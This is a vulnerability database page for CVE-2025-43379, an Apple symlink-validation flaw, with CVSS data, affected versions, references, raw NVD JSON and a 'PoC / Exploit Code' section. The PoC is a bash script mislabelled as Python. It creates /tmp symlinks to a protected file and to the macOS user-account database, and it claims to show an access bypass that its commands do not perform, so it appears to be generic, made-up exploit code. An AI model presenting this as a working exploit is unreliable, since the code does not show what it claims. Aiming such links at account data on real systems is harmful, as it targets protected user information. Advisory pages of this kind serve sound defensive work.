CVE-2025-43379

Description

This issue was addressed with improved validation of symlinks. This issue is fixed in iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1, tvOS 26.1, visionOS 26.1, watchOS 26.1. An app may be able to access protected user data.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE

Apple iOS < 26.1

Apple iPadOS < 26.1

Apple macOS Sequoia < 15.7.2

Apple macOS Sonoma < 14.8.2

Apple macOS Tahoe < 26.1

Apple tvOS < 26.1

Apple visionOS < 26.1

Apple watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-43379 PoC - Symbolic Link Traversal
# This PoC demonstrates the symlink validation issue

# Create a symlink pointing to a protected file
ln -sf /Users/Shared/secret_data.txt /tmp/app_data_link

# Alternative: Point to system configuration
ln -sf /var/db/dslocal/nodes/Default/users/ /tmp/users_link

# In a real attack scenario:
# 1. Malicious app creates symlink to protected data
# 2. App uses file picker or document handler
# 3. System resolves symlink without proper validation
# 4. Protected data becomes accessible

# Example iOS/macOS code pattern that would trigger:
# let fileManager = FileManager.default
# let data = try Data(contentsOf: URL(fileURLWithPath: "/tmp/app_data_link"))
# // Without proper symlink check, this reads /Users/Shared/secret_data.txt

echo "Symlink created: /tmp/app_data_link -> /Users/Shared/secret_data.txt"
echo "PoC demonstrates symlink can bypass file access restrictions"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43379
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43379
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43379/
[4] VulDB https://vuldb.com/cve/CVE-2025-43379
[5] https://support.apple.com/en-us/125632
[6] https://support.apple.com/en-us/125634
[7] https://support.apple.com/en-us/125635
[8] https://support.apple.com/en-us/125636
[9] https://support.apple.com/en-us/125637
[10] https://support.apple.com/en-us/125638
[11] https://support.apple.com/en-us/125639

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43379", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:45.000", "lastModified": "2026-04-02T19:20:36.403", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved validation of symlinks. This issue is fixed in iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1, tvOS 26.1, visionOS 26.1, watchOS 26.1. An app may be able to access protected user data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.8.2", "matchCriteriaId": "84A2783A-5B53-4DAB-80C4-8D62E332802A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.2", "matchCriteriaId": "4BE8199E-63D1-496C-B107-52853CFC2311"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "290E0D29-CB5B-45A7-9FE3-FD2030B1D1A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125635", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125636", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125637", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}